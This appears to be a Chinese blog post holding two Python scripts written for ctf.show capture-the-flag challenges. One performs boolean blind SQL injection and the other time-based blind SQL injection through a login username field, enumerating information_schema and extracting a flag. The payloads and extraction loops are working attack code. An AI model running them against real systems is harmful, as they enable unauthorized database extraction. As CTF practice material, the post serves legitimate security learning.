SQL注入-2
2022/4/5 2:18:59
本文主要是介绍SQL注入-2,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
简单盲注
import requests
import time
result = ""
url = 'http://986b6ffa-086c-4650-8237-9557e9bd100c.challenge.ctf.show/api/'
for i in range(80):
min_num = 32
max_num = 127
while True:
mid_num = (min_num + max_num) >> 1
if mid_num == min_num:
result += chr(mid_num)
print(result)
break
# table_name = ctfshow_fl0g,ctfshow_user
# column_name = id,f1ag
# payload = "admin' and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_user'),{},1))<{}#".format(i, mid_num)
payload = "admin' and ascii(substr((select f1ag from ctfshow_fl0g),{},1))<{}#".format(i, mid_num)
data = {
'username': payload,
'password': 0
}
response = requests.post(url, data=data)
time.sleep(0.25)
if response.text.find('8bef') > 0:
max_num = mid_num
else:
min_num = mid_num
简单时间盲注
import requests
import time
dic = ' ,ctfshow{}abdegijklmnpqruvxyz0123456789-_{}ABCDEFGHIJKLMNOPQRSTUVWXYZ'
url = 'http://414da80d-977f-4f64-baf7-5a7adbebb60a.challenge.ctf.show/api/'
result = ''
for i in range(1, 60):
for word in dic:
# payload = "admin' and if(left(database(),{0})='{1}',sleep(3),0)#".format(i, result + word)
# payload = "admin' and if(left((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),{0})='{1}',sleep(3),0)#".format(i, result + word)
# payload = "admin' and if(left((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flxg'),{})='{}',sleep(3),0)#".format(i, result + word)
payload = "admin' and if(left((select f1ag from ctfshow_flxg),{})='{}',sleep(3),0)#".format(i, result + word)
data = {
'username': payload,
'password': 0
}
try:
response = requests.post(url, data=data, timeout=2.5)
time.sleep(0.25)
except:
result += word
print(result)
break
这篇关于SQL注入-2的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-13TiDB + ES:转转业财系统亿级数据存储优化实践
- 2024-05-09“2024鸿蒙零基础快速实战-仿抖音App开发(ArkTS版)”实战课程已上线
- 2024-05-09聊聊如何通过arthas-tunnel-server来远程管理所有需要arthas监控的应用
- 2024-05-09log4j2这么配就对了
- 2024-05-09nginx修改Content-Type
- 2024-05-09Redis多数据源,看这篇就够了
- 2024-05-09Google Chrome驱动程序 124.0.6367.62(正式版本)去哪下载?
- 2024-05-09有没有大佬知道这种数据应该怎么抓取呀?
- 2024-05-09这种运行结果里的10.100000001,怎么能最快改成10.1?
- 2024-05-09企业src漏洞挖掘-有意思的命令执行
